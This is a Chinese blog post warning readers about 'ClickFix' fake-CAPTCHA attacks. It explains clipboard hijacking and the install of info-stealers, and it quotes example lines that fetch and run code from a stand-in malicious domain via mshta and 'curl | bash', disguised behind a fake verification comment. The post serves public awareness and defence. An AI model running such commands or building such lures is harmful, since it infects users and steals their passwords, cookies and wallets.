转载请注明出处小锋学长生活大爆炸[xfxuezhagn.cn]如果本文帮助到了你欢迎[点赞、收藏、关注]哦~学长今天在日常逛软件分享网站时候跳出来一个谷歌人机验证一开始没在意但跟选图片的验证不一样的是这次跳出来一个要终端输入命令的验证。得亏学长平时刷各种小网站看得多意识到这就是个钓鱼验证估计是这个网站被黑客劫持了。这些指令看似无害但如果你按照步骤操作实际上会感染恶意软件很可能是信息窃取程序。原理解析这种攻击之所以被称为“ClickFix”是因为它本质上是一场精心的心理博弈社会工程学而不是利用系统漏洞。它的原理大概是这样的第一步诱导访问恶意页面页面会伪装成 Cloudflare 验证、Google reCAPTCHA 或微软服务界面看起来非常正规。也可能某些老实本分的网站被黑客攻击后注入恶意代码。第二步伪造验证界面页面会显示一个假的 Im not a robot 复选框。用户点击后页面不会显示正常的图片验证而是弹出额外验证步骤声称需要进一步证明你是人类。甚至代码与正规的reCAPTCHA验证都不一样第三步剪贴板劫持核心攻击手法这是最关键的技术环节。在用户与页面交互的过程中例如点击复制按钮或勾选复选框时恶意 JavaScript 会在后台执行类似document.execCommand(copy)或Clipboard API将一段经过混淆的恶意命令悄悄写入用户的剪贴板。在基于 Chromium 内核的浏览器几乎所有主流浏览器都是如此中网站只有在获得你的许可后才能写入剪贴板。但 Windows 系统误以为你在第一个屏幕上勾选复选框时已经同意了这一操作。 并且页面上显示的只是你粘贴的内容的最后一部分而你看到的并不是命令的真正部分而只是添加到命令后面的注释在正常情况下这就是我们所能看到的目标对象被指示粘贴的第一部分内容是以下几种变体有时会进行模糊处理mshta https://{malicious.domain}/media.fileMshta 命令会触发合法的 Windows 可执行文件 mshta.exe。但 mshta 会从指定的域中获取恶意媒体文件并运行它。该媒体文件的名称可能看起来完全正常。这些文件实际上是一个经过编码的 PowerShell 命令它会在后台隐蔽运行并下载实际的有效载荷。也可能剪贴板里的内容已经被替换成了一串复杂的 Base64 加密字符或直接的 curl 下载指令比如# 前面是恶意命令被隐藏 curl -s https://malicious.domain/payload.sh | bash # 后面是显示给用户的无害文本作为注释或命令的一部分 # I am not a robot - reCAPTCHA Verification ID: 48164第四步用户自行执行恶意命令用户按照指示• 打开 TerminalmacOS或 Run 对话框/PowerShellWindows• 按 Command V或 Ctrl V粘贴• 按 Enter 执行传统的恶意软件往往通过“下载文件并让用户点击安装”来传播这种方式容易被浏览器的安全拦截如 Chrome 的“此文件可能对您的计算机有害”或系统的安全中心Gatekeeper发现。而终端是系统的底层管理工具权限极高。因此攻击者引导你直接在 Terminal终端 运行代码当你手动粘贴代码并回车时系统会认为这是用户授权的合法操作从而绕过大多数浏览器的下载安全检测安全软件通常也不会拦截用户在 Terminal 中手动执行的命令。第五步下载并执行恶意负载一旦命令执行通常会• 使用 curl 或 mshta 等合法系统工具从远程服务器下载恶意脚本• 脚本可能下载信息窃取器如 Lumma Stealer、Atomic macOS Stealer、Amos Stealer• 窃取浏览器保存的密码、Cookie、加密货币钱包、自动填充数据等• 建立持久化机制添加启动项、创建计划任务等• 清除剪贴板内容以隐藏痕迹为什么这种攻击有效因素说明信任滥用用户熟悉 reCAPTCHA 界面降低了警惕性用户自主执行绕过所有自动防护属于Living off the land攻击视觉欺骗只显示命令的无害尾部隐藏真正的恶意代码紧迫感配合倒计时、错误提示等制造心理压力跨平台可针对 WindowsPowerShell/Run、macOSTerminal、Linux 定制这类攻击在 2024-2025 年激增超过500%已成为增长最快的社会工程学威胁之一。记住真正的验证码只在网页内点击复选框或选择图片、绝不会要求你打开系统终端、绝不会让你粘贴并执行代码。